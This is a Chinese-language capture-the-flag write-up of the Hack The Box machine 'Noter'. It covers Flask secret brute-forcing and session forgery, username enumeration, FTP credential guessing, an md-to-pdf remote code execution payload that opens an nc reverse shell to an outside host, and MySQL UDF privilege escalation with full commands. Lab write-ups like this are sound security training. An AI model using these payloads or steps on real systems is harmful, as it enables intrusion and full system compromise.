HTB-467-Noter
https://app.hackthebox.com/machines/467 ,一道release第三天做的題目。因?yàn)榈谒奶斓臅r(shí)候題目不是early release了,所以后面題目的
https://app.hackthebox.com/machines/467 ,一道release第三天做的題目。因?yàn)榈谒奶斓臅r(shí)候題目不是early release了,所以后面題目的IP發(fā)生了些變化。
1. 信息收集
nmap -T4 -p- --min-rate 1000 10.129.172.123nnnmap -sCV -p21,22 10.129.172.123nn21/tcp open ftp vsftpd 3.0.3n22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)n| ssh-hostkey:n| 3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)n| 256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)n|_ 256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)nnPORT STATE SERVICE VERSIONn5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)n|_http-title: Notern|_http-server-header: Werkzeug/2.0.2 Python/3.8.10nnsudo nmap -T4 -sU -p- --min-rate 1000 10.129.172.123n
2. web
2.1. 爆破獲得flask的secrets
這是一個(gè)flask的站,注冊(cè)登陸后可以看到頭部存在session信息。可以通過(guò)flask-unsign爆破獲得flask加密的key(其實(shí)這里卡了挺久的,沒(méi)想到上來(lái)就要爆破...)。
../venv/bin/flask-unsign --unsign --cookie '.eJx9i7EKwzAMBX9FvLF4D_hPSglBOKobSGWQbDoY_3tNs3c6Du46tufJ_hJHfHRQnYC3lMQdAffSiE1Iy4dM8uFVTHZi3Smx0lkyHYp1hP_r7PLcfukacOk2NVZrEtBcTPktiOh9uS1jYHwBx0Y0TQ.YnpxIg.okKesUrk11sVuiAOC7yyXAbH_aE'nn[*] Session decodes to: {'_flashes': [('success', 'You are now registered and can log in'), ('success', 'You are now logged in')], 'logged_in': True, 'username': '{{7*7}}'}n[*] No wordlist selected, falling back to default wordlist..n[*] Starting brute-forcer with 8 threads..n[*] Attempted (2176): -----BEGIN PRIVATE KEY-----***n[+] Found secret key after 16640 attempts7KATyfe!lkjln'secret123'n
2.2. 爆破獲取admin用戶名
在登陸的過(guò)程中,發(fā)現(xiàn)用戶名是否存在返回的錯(cuò)誤信息是不同的。
密碼錯(cuò)誤的時(shí)候
所以進(jìn)行爆破,獲取一個(gè)用戶。
id: template-idnninfo:n name: Template Namen author: ymoonn severity: infon description: descriptionnnnrequests:n- raw:n - |-n POST /login HTTP/1.1n Host: {{Hostname}}n Content-Length: 37n Cache-Control: max-age=0n Upgrade-Insecure-Requests: 1n Origin: http://10.129.173.7:5000n Content-Type: application/x-www-form-urlencodedn User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9n Referer: http://10.129.173.7:5000/loginn Accept-Encoding: gzip, deflaten Accept-Language: zh-CN,zh;q=0.9n Connection: closenn username={{param}}&password=1234qweasdnn attack: batteringramn threads: 20n payloads:n param: /Users/ymoon/workspace/tools/SecLists/Usernames/Names/names.txtn matchers:n - type: wordn words:n - "Invalid login"n
找到了一個(gè)用戶blue。利用前面爆破得到的secrets進(jìn)行簽名。
../venv/bin/flask-unsign -s --secret "secret123" --cookie "{"logged_in":True,"username":"blue"}"neyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yo4zkg.7C0uzGVwYdr4LMIDtm1cGxwef2An
2.3. ftp爆破
登陸后查看他的筆記,發(fā)現(xiàn)如下信息。
Hello, Thank you for choosing our premium service. Now you are capable ofndoing many more things with our application. All the information you are goingnto need are on the Email we sent you. By the way, now you can access our FTPnservice as well. Your username is 'blue' and the password is 'blue@Noter!'.nMake sure to remember them and delete this. n(Additional information are included in the attachments we sent along thenEmail) n nWe all hope you enjoy our service. Thanks! n nftp_adminnn
登陸blue的ftp服務(wù)器,存在一個(gè)pdf文件,文件中描述了系統(tǒng)中用戶對(duì)應(yīng)密碼的初始化規(guī)則。注意上面的筆記中,存在一個(gè)ftp_admin用戶。
根據(jù) blue ftp中的pdf推測(cè)ftp_admin的ftp密碼。登陸后獲取到源碼。
ftp ...nftp_adminnftp_admin@Noter!n
2.4. md-to-pdf rce
審計(jì)代碼,發(fā)現(xiàn)了一個(gè)md-to-pdf的node包。搜索后,發(fā)現(xiàn)這個(gè)包存在rce。
利用md-to-pdf進(jìn)行題提權(quán)。
@app.route("/a1.md")ndef hi3(): n return '''n ---jsn((require("child_process")).execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 55555 >/tmp/f"))n---RCEn ''' n
獲得shell后寫(xiě)入密鑰。
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQA...' > authorized_keysnchmod 600 authorized_keysn
3. mysql udf 提權(quán)
利用linpeas.sh搜集信息,發(fā)現(xiàn)mysql居然是以root用戶執(zhí)行的。
同時(shí)在ftp_admin的ftp中的源碼中存在mysql的賬號(hào)密碼。
登錄到mysql后可以提權(quán)。
# 判斷是否有寫(xiě)文件權(quán)限n# 空則任意寫(xiě)n# null為不能寫(xiě)nshow variables like "%secure_file_priv%"; nn# 找到plugin位置nshow variables like "%plugin%";n# 獲取服務(wù)器版本信息nshow variables like 'version_compile_%';n
獲取udf文件。
# sqlmapnsqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_n# 解密soncd sqlmap/extra/cloaknpython3 cloak.py -d -i /security/ctf/tools_bar/4_注入攻擊/SQLI/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so_n# 或者由msf中獲取n/usr/share/metasploit-framework/data/exploits/mysqlnnselect unhex('7F454C46020...') into dumpfile '/usr/local/Cellar/mysql/5.7.22/lib/plugin/mysqludf.so';nncreate function sys_eval returns string soname "mysqludf.so";nnselect sys_eval('whoami');n
4. 參考文檔
https://github.com/SEC-GO/Red-vs-Blue/blob/master/linux環(huán)境下的MySQL UDF提權(quán).md
